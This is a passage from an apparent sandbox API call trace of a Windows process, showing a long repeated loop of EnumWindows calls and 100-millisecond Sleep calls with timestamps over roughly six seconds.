(dwMilliseconds=0x64) [0150.099] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0150.099] Sleep (dwMilliseconds=0x64) [0150.105] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0150.105] Sleep (dwMilliseconds=0x64) [0150.120] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0150.120] Sleep (dwMilliseconds=0x64) [0150.136] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0150.136] Sleep (dwMilliseconds=0x64) [0150.151] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0150.151] Sleep (dwMilliseconds=0x64) [0150.167] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0150.167] Sleep (dwMilliseconds=0x64) [0150.183] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0150.184] Sleep (dwMilliseconds=0x64) [0150.198] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0150.198] Sleep (dwMilliseconds=0x64) [0150.214] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0150.215] Sleep (dwMilliseconds=0x64) [0150.261] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0150.261] Sleep (dwMilliseconds=0x64) [0150.293] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0150.294] Sleep (dwMilliseconds=0x64) [0150.307] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0150.308] Sleep (dwMilliseconds=0x64) [0150.324] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0150.325] Sleep (dwMilliseconds=0x64) [0150.339] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0150.339] Sleep (dwMilliseconds=0x64) [0150.354] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0150.355] Sleep (dwMilliseconds=0x64) [0150.371] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0150.371] Sleep (dwMilliseconds=0x64) [0150.386] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0150.386] Sleep (dwMilliseconds=0x64) [0150.448] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0150.448] Sleep (dwMilliseconds=0x64) [0150.473] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0150.473] Sleep (dwMilliseconds=0x64) [0150.480] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0150.480] Sleep (dwMilliseconds=0x64) [0150.496] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0150.497] Sleep (dwMilliseconds=0x64) [0150.510] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0150.511] Sleep (dwMilliseconds=0x64) [0150.526] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0150.526] Sleep (dwMilliseconds=0x64) [0150.542] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0150.542] Sleep (dwMilliseconds=0x64) [0150.557] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0150.558] Sleep (dwMilliseconds=0x64) [0150.621] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0150.621] Sleep (dwMilliseconds=0x64) [0150.656] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0150.657] Sleep (dwMilliseconds=0x64) [0150.667] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0150.667] Sleep (dwMilliseconds=0x64) [0150.682] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0150.683] Sleep (dwMilliseconds=0x64) [0150.717] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0150.718] Sleep (dwMilliseconds=0x64) [0150.730] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0150.730] Sleep (dwMilliseconds=0x64) [0150.745] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0150.745] Sleep (dwMilliseconds=0x64) [0150.807] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0150.808] Sleep (dwMilliseconds=0x64) [0150.846] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0150.846] Sleep (dwMilliseconds=0x64) [0150.854] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0150.854] Sleep (dwMilliseconds=0x64) [0150.872] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0150.872] Sleep (dwMilliseconds=0x64) [0150.888] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0150.889] Sleep (dwMilliseconds=0x64) [0150.904] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0150.904] Sleep (dwMilliseconds=0x64) [0150.919] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0150.920] Sleep (dwMilliseconds=0x64) [0150.932] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0150.933] Sleep (dwMilliseconds=0x64) [0151.074] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0151.075] Sleep (dwMilliseconds=0x64) [0151.153] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0151.153] Sleep (dwMilliseconds=0x64) [0151.201] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0151.201] Sleep (dwMilliseconds=0x64) [0151.214] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0151.214] Sleep (dwMilliseconds=0x64) [0151.229] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0151.229] Sleep (dwMilliseconds=0x64) [0151.245] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0151.245] Sleep (dwMilliseconds=0x64) [0151.262] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0151.263] Sleep (dwMilliseconds=0x64) [0151.276] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0151.276] Sleep (dwMilliseconds=0x64) [0151.291] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0151.292] Sleep (dwMilliseconds=0x64) [0151.308] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0151.308] Sleep (dwMilliseconds=0x64) [0151.327] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0151.327] Sleep (dwMilliseconds=0x64) [0151.339] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0151.339] Sleep (dwMilliseconds=0x64) [0151.355] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0151.355] Sleep (dwMilliseconds=0x64) [0151.371] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0151.371] Sleep (dwMilliseconds=0x64) [0151.385] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0151.386] Sleep (dwMilliseconds=0x64) [0151.401] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0151.401] Sleep (dwMilliseconds=0x64) [0151.417] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0151.417] Sleep (dwMilliseconds=0x64) [0151.435] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0151.436] Sleep (dwMilliseconds=0x64) [0151.448] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0151.448] Sleep (dwMilliseconds=0x64) [0151.464] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0151.465] Sleep (dwMilliseconds=0x64) [0151.485] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0151.485] Sleep (dwMilliseconds=0x64) [0151.495] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0151.495] Sleep (dwMilliseconds=0x64) [0151.510] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0151.511] Sleep (dwMilliseconds=0x64) [0151.526] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0151.526] Sleep (dwMilliseconds=0x64) [0151.542] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0151.542] Sleep (dwMilliseconds=0x64) [0151.557] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0151.557] Sleep (dwMilliseconds=0x64) [0151.574] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0151.574] Sleep (dwMilliseconds=0x64) [0151.589] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0151.589] Sleep (dwMilliseconds=0x64) [0151.611] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0151.611] Sleep (dwMilliseconds=0x64) [0151.620] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0151.620] Sleep (dwMilliseconds=0x64) [0151.636] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0151.636] Sleep (dwMilliseconds=0x64) [0151.651] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0151.651] Sleep (dwMilliseconds=0x64) [0151.667] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0151.667] Sleep (dwMilliseconds=0x64) [0151.682] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0151.682] Sleep (dwMilliseconds=0x64) [0151.715] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0151.715] Sleep (dwMilliseconds=0x64) [0151.729] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0151.730] Sleep (dwMilliseconds=0x64) [0151.745] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0151.745] Sleep (dwMilliseconds=0x64) [0151.760] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0151.761] Sleep (dwMilliseconds=0x64) [0151.777] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0151.777] Sleep (dwMilliseconds=0x64) [0151.792] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0151.792] Sleep (dwMilliseconds=0x64) [0151.807] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0151.807] Sleep (dwMilliseconds=0x64) [0151.870] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0151.870] Sleep (dwMilliseconds=0x64) [0151.909] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0151.909] Sleep (dwMilliseconds=0x64) [0151.917] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0151.917] Sleep (dwMilliseconds=0x64) [0151.932] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0151.932] Sleep (dwMilliseconds=0x64) [0151.948] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0151.948] Sleep (dwMilliseconds=0x64) [0151.963] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0151.964] Sleep (dwMilliseconds=0x64) [0151.979] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0151.979] Sleep (dwMilliseconds=0x64) [0151.995] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0151.995] Sleep (dwMilliseconds=0x64) [0152.087] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0152.088] Sleep (dwMilliseconds=0x64) [0152.152] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0152.154] Sleep (dwMilliseconds=0x64) [0152.166] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0152.167] Sleep (dwMilliseconds=0x64) [0152.279] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0152.279] Sleep (dwMilliseconds=0x64) [0152.296] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0152.297] Sleep (dwMilliseconds=0x64) [0152.307] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0152.307] Sleep (dwMilliseconds=0x64) [0152.326] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0152.326] Sleep (dwMilliseconds=0x64) [0152.341] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0152.341] Sleep (dwMilliseconds=0x64) [0152.356] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0152.357] Sleep (dwMilliseconds=0x64) [0152.370] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0152.370] Sleep (dwMilliseconds=0x64) [0152.388] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0152.388] Sleep (dwMilliseconds=0x64) [0152.404] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0152.404] Sleep (dwMilliseconds=0x64) [0152.417] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0152.418] Sleep (dwMilliseconds=0x64) [0152.432] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0152.432] Sleep (dwMilliseconds=0x64) [0152.448] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0152.448] Sleep (dwMilliseconds=0x64) [0152.464] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0152.464] Sleep (dwMilliseconds=0x64) [0152.479] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0152.479] Sleep (dwMilliseconds=0x64) [0152.497] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0152.497] Sleep (dwMilliseconds=0x64) [0152.513] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0152.514] Sleep (dwMilliseconds=0x64) [0152.528] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0152.529] Sleep (dwMilliseconds=0x64) [0152.544] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0152.544] Sleep (dwMilliseconds=0x64) [0152.557] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0152.558] Sleep (dwMilliseconds=0x64) [0152.575] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0152.575] Sleep (dwMilliseconds=0x64) [0152.588] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0152.589] Sleep (dwMilliseconds=0x64) [0152.614] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0152.615] Sleep (dwMilliseconds=0x64) [0152.620] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0152.620] Sleep (dwMilliseconds=0x64) [0152.641] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0152.642] Sleep (dwMilliseconds=0x64) [0152.674] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0152.675] Sleep (dwMilliseconds=0x64) [0152.735] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0152.736] Sleep (dwMilliseconds=0x64) [0152.779] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0152.779] Sleep (dwMilliseconds=0x64) [0152.792] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0152.793] Sleep (dwMilliseconds=0x64) [0152.807] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0152.808] Sleep (dwMilliseconds=0x64) [0152.826] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0152.826] Sleep (dwMilliseconds=0x64) [0152.841] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0152.841] Sleep (dwMilliseconds=0x64) [0152.854] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0152.854] Sleep (dwMilliseconds=0x64) [0152.870] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0152.870] Sleep (dwMilliseconds=0x64) [0152.936] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0152.936] Sleep (dwMilliseconds=0x64) [0152.970] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0152.970] Sleep (dwMilliseconds=0x64) [0152.979] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0152.980] Sleep (dwMilliseconds=0x64) [0152.995] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0152.995] Sleep (dwMilliseconds=0x64) [0153.013] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0153.013] Sleep (dwMilliseconds=0x64) [0153.028] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0153.029] Sleep (dwMilliseconds=0x64) [0153.042] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0153.042] Sleep (dwMilliseconds=0x64) [0153.058] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0153.061] Sleep (dwMilliseconds=0x64) [0153.120] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0153.120] Sleep (dwMilliseconds=0x64) [0153.154] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0153.154] Sleep (dwMilliseconds=0x64) [0153.167] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0153.167] Sleep (dwMilliseconds=0x64) [0153.182] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0153.182] Sleep (dwMilliseconds=0x64) [0153.198] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0153.198] Sleep (dwMilliseconds=0x64) [0153.214] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0153.214] Sleep (dwMilliseconds=0x64) [0153.229] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0153.229] Sleep (dwMilliseconds=0x64) [0153.245] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0153.245] Sleep (dwMilliseconds=0x64) [0153.309] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0153.310] Sleep (dwMilliseconds=0x64) [0153.355] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0153.355] Sleep (dwMilliseconds=0x64) [0153.370] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0153.370] Sleep (dwMilliseconds=0x64) [0153.385] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0153.386] Sleep (dwMilliseconds=0x64) [0153.401] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0153.401] Sleep (dwMilliseconds=0x64) [0153.418] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0153.420] Sleep (dwMilliseconds=0x64) [0153.432] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0153.433] Sleep (dwMilliseconds=0x64) [0153.448] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0153.450] Sleep (dwMilliseconds=0x64) [0153.513] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0153.513] Sleep (dwMilliseconds=0x64) [0153.556] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0153.557] Sleep (dwMilliseconds=0x64) [0153.573] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0153.573] Sleep (dwMilliseconds=0x64) [0153.588] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0153.589] Sleep (dwMilliseconds=0x64) [0153.611] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0153.612] Sleep (dwMilliseconds=0x64) [0153.620] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0153.620] Sleep (dwMilliseconds=0x64) [0153.635] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0153.636] Sleep (dwMilliseconds=0x64) [0153.651] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0153.652] Sleep (dwMilliseconds=0x64) [0153.714] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0153.714] Sleep (dwMilliseconds=0x64) [0153.812] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0153.813] Sleep (dwMilliseconds=0x64) [0153.824] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0153.824] Sleep (dwMilliseconds=0x64) [0153.839] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0153.839] Sleep (dwMilliseconds=0x64) [0153.859] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0153.859] Sleep (dwMilliseconds=0x64) [0153.877] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0153.878] Sleep (dwMilliseconds=0x64) [0153.885] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0153.886] Sleep (dwMilliseconds=0x64) [0153.901] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0153.902] Sleep (dwMilliseconds=0x64) [0153.917] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0153.917] Sleep (dwMilliseconds=0x64) [0153.979] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0153.980] Sleep (dwMilliseconds=0x64) [0154.016] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0154.016] Sleep (dwMilliseconds=0x64) [0154.026] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0154.026] Sleep (dwMilliseconds=0x64) [0154.185] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0154.186] Sleep (dwMilliseconds=0x64) [0154.228] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0154.229] Sleep (dwMilliseconds=0x64) [0154.245] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0154.245] Sleep (dwMilliseconds=0x64) [0154.261] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0154.261] Sleep (dwMilliseconds=0x64) [0154.277] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0154.277] Sleep (dwMilliseconds=0x64) [0154.292] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0154.292] Sleep (dwMilliseconds=0x64) [0154.310] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0154.311] Sleep (dwMilliseconds=0x64) [0154.323] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0154.323] Sleep (dwMilliseconds=0x64) [0154.339] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0154.339] Sleep (dwMilliseconds=0x64) [0154.386] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0154.387] Sleep (dwMilliseconds=0x64) [0154.423] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0154.423] Sleep (dwMilliseconds=0x64) [0154.432] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0154.433] Sleep (dwMilliseconds=0x64) [0154.449] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0154.450] Sleep (dwMilliseconds=0x64) [0154.463] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0154.464] Sleep (dwMilliseconds=0x64) [0154.482] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0154.482] Sleep (dwMilliseconds=0x64) [0154.496] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0154.496] Sleep (dwMilliseconds=0x64) [0154.511] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0154.511] Sleep (dwMilliseconds=0x64) [0154.589] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0154.589] Sleep (dwMilliseconds=0x64) [0154.626] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0154.626] Sleep (dwMilliseconds=0x64) [0154.635] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0154.636] Sleep (dwMilliseconds=0x64) [0154.651] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0154.651] Sleep (dwMilliseconds=0x64) [0154.667] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0154.667] Sleep (dwMilliseconds=0x64) [0154.682] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0154.683] Sleep (dwMilliseconds=0x64) [0154.698] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0154.698] Sleep (dwMilliseconds=0x64) [0154.714] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0154.714] Sleep (dwMilliseconds=0x64) [0154.777] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0154.777] Sleep (dwMilliseconds=0x64) [0154.806] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0154.806] Sleep (dwMilliseconds=0x64) [0154.829] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0154.830] Sleep (dwMilliseconds=0x64) [0154.841] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0154.842] Sleep (dwMilliseconds=0x64) [0154.875] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0154.876] Sleep (dwMilliseconds=0x64) [0154.886] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0154.886] Sleep (dwMilliseconds=0x64) [0154.901] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0154.901] Sleep (dwMilliseconds=0x64) [0154.964] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0154.964] Sleep (dwMilliseconds=0x64) [0155.004] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0155.005] Sleep (dwMilliseconds=0x64) [0155.010] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0155.011] Sleep (dwMilliseconds=0x64) [0155.026] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0155.026] Sleep (dwMilliseconds=0x64) [0155.048] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0155.048] Sleep (dwMilliseconds=0x64) [0155.057] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0155.058] Sleep (dwMilliseconds=0x64) [0155.073] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0155.073] Sleep (dwMilliseconds=0x64) [0155.090] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0155.091] Sleep (dwMilliseconds=0x64) [0155.104] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0155.105] Sleep (dwMilliseconds=0x64) [0155.123] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0155.123] Sleep (dwMilliseconds=0x64) [0155.169] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0155.170] Sleep (dwMilliseconds=0x64) [0155.216] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0155.217] Sleep (dwMilliseconds=0x64) [0155.263] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0155.263] Sleep (dwMilliseconds=0x64) [0155.308] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0155.311] Sleep (dwMilliseconds=0x64) [0155.356] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0155.357] Sleep (dwMilliseconds=0x64) [0155.405] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0155.405] Sleep (dwMilliseconds=0x64) [0155.448] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0155.448] Sleep (dwMilliseconds=0x64) [0155.487] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0155.488] Sleep (dwMilliseconds=0x64) [0155.495] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0155.496] Sleep (dwMilliseconds=0x64) [0155.543] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0155.544] Sleep (dwMilliseconds=0x64) [0155.567] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0155.567] Sleep (dwMilliseconds=0x64) [0155.573] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0155.573] Sleep (dwMilliseconds=0x64) [0155.589] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0155.589] Sleep (dwMilliseconds=0x64) [0155.638] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0155.638] Sleep (dwMilliseconds=0x64) [0155.655] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0155.655] Sleep (dwMilliseconds=0x64) [0155.667] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0155.667] Sleep (dwMilliseconds=0x64) [0155.698] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0155.698] Sleep (dwMilliseconds=0x64) [0155.738] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0155.739] Sleep (dwMilliseconds=0x64) [0155.745] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0155.745] Sleep (dwMilliseconds=0x64) [0155.794] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0155.794] Sleep (dwMilliseconds=0x64) [0155.832] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0155.833] Sleep (dwMilliseconds=0x64) [0155.839] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0155.839] Sleep (dwMilliseconds=0x64) [0155.888] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0155.889] Sleep (dwMilliseconds=0x64) [0155.967] 